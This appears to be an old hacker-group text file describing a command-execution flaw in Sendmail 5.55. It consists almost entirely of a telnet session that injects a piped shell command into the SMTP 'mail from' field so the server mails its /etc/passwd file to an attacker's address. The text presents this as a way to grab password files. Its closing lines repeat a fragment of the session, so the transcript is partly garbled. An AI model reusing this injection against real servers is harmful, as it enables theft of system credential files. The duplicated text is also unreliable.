..:-={{Collaborative Security Information Center}}=-:..
          X-TREME & TECHNOTRONIC Security Collaboration Project
     http://www.technotronic.com  -=©=-  http://www.x-treme.abyss.com

Sendmail: 5.55

Some versions allow us to execute commands; often leading to
interesting effects like password file grabbing:

 % telnet target.com 25
 Trying 123.456.789.0...
 Connected to target.com
 Escape character is '^]'.
 220 target.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51
 mail from: "|/bin/mail me@myhost.com < /etc/passwd"
 250 "|/bin/mail me@myhost.com < /etc/passwd"... Sender ok
 rcpt to: mickeymouse
 550 mickeymouse... User unknown
 data
 354 Enter mail, end with "." on a line by itself
 .
 250 Mail accepted
 quit
 Connection closed by foreign host.
 % "." on a line by itself
 .
 250 Mail accepted
 quit
 Connection closed by foreign host.
 %